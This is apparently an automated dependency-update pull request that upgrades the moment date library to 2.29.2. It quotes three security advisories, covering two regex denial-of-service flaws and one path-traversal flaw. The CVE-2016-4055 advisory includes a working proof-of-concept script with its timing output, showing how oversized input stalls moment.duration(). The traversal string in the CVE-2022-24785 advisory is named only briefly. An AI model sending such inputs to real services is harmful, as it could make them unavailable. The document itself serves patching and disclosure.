@renovatebot-confluentinc renovatebot-confluentinc bot commented May 15, 2025

For any questions/concerns about this PR, please review the Renovate Bot wiki/FAQs, or the #renovatebot Slack channel.

This PR contains the following updates:

Package: moment (source)
Change: 1.0.0 -> 2.29.2

GitHub Vulnerability Alerts

CVE-2016-4055

Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().

Proof of concept

var moment = require('moment');

// Note: `i` is a single shared variable. genstr's loop reuses the same `i`
// as the outer loop, which is why COUNT in the results below advances by
// 10001 rather than 10000. Declared here so the script is valid in strict
// mode while behaving exactly as the original PoC.
var i;

// Build a string of (len + 1) copies of chr.
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }

    return result;
};

// Feed moment.duration() progressively longer inputs and time each call;
// the time spent in the regular expression grows super-linearly with length.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);

    var end = process.hrtime(start); // [seconds, nanoseconds] elapsed
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Recommendation

Please update to version 2.11.2 or later.

CVE-2017-18214

Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.

Recommendation

Update to version 2.19.3 or later.

CVE-2022-24785

Impact

This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale.

Patches

This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).

Workarounds

Sanitize user-provided locale name before passing it to moment.js.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:


Regular Expression Denial of Service in moment

CVE-2016-4055 / GHSA-87vv-r9j6-g5qv


Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Regular Expression Denial of Service in moment

CVE-2017-18214 / GHSA-446m-mv8f-q348


Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Path Traversal: 'dir/../../filename' in moment.locale

CVE-2022-24785 / GHSA-8hfj-j24r-96c4


Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Renovate Bot.
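One way to implement the "sanitize user-provided locale name" workaround from the CVE-2022-24785 advisory above, as an added example that is not moment.js code or anything from this PR: a narrow shape check followed by an allowlist of the locales the application actually ships, with a default fallback. The allowlist, the default locale, the length limit and the simplified BCP 47-style regex are assumptions; the sample inputs are constructed.

```javascript
// Added example (not moment.js code): validate a user-supplied locale name
// before it ever reaches moment.locale(). Two layers: a strict shape check
// that excludes path characters, then an allowlist of shipped locales.

const ALLOWED_LOCALES = ["en", "fr", "de", "pt-br", "zh-cn"]; // assumed allowlist
const DEFAULT_LOCALE = "en";                                   // assumed default

// Language subtag plus optional 2-8 char alphanumeric subtags, lowercase only.
// No '/', '\\', '.' or whitespace can match, so traversal strings fail here.
const LOCALE_SHAPE = /^[a-z]{2,3}(-[a-z0-9]{2,8})*$/;

function sanitizeLocale(input, allowed = ALLOWED_LOCALES, fallback = DEFAULT_LOCALE) {
  if (typeof input !== "string" || input.length > 35) {
    return { locale: fallback, accepted: false, reason: "not a string or too long" };
  }
  const candidate = input.trim().toLowerCase();
  if (!LOCALE_SHAPE.test(candidate)) {
    return { locale: fallback, accepted: false, reason: "malformed locale tag" };
  }
  if (!allowed.includes(candidate)) {
    return { locale: fallback, accepted: false, reason: "locale not shipped" };
  }
  return { locale: candidate, accepted: true, reason: "ok" };
}

// Constructed inputs: the traversal-style value from the advisory title is
// rejected by the shape check; an unshipped but well-formed tag is rejected
// by the allowlist; rejections carry a reason suitable for logging.
const samples = ["fr", "PT-BR", "dir/../../filename", "es", "", 42];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", JSON.stringify(sanitizeLocale(s)));
}
```

In request handling this becomes `moment.locale(sanitizeLocale(req.query.lang).locale)`, and a rejected result with reason "malformed locale tag" is worth logging as a probing attempt.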

@service-bot-app service-bot-app bot marked this pull request as ready for review May 15, 2025 07:47
@service-bot-app service-bot-app bot requested a review from a team as a code owner May 15, 2025 07:47
@service-bot-app

Could not automerge PR: Found a file in the diff that is not marked as an approved dependency file: example/pnpm-lock.yaml

@renovatebot-confluentinc renovatebot-confluentinc bot changed the title fix(deps): update dependency moment to v2 [security] (main) WARNING: MAJOR (BREAKING) CHANGE: Update dependency moment to v2 [SECURITY] (main) Jun 14, 2025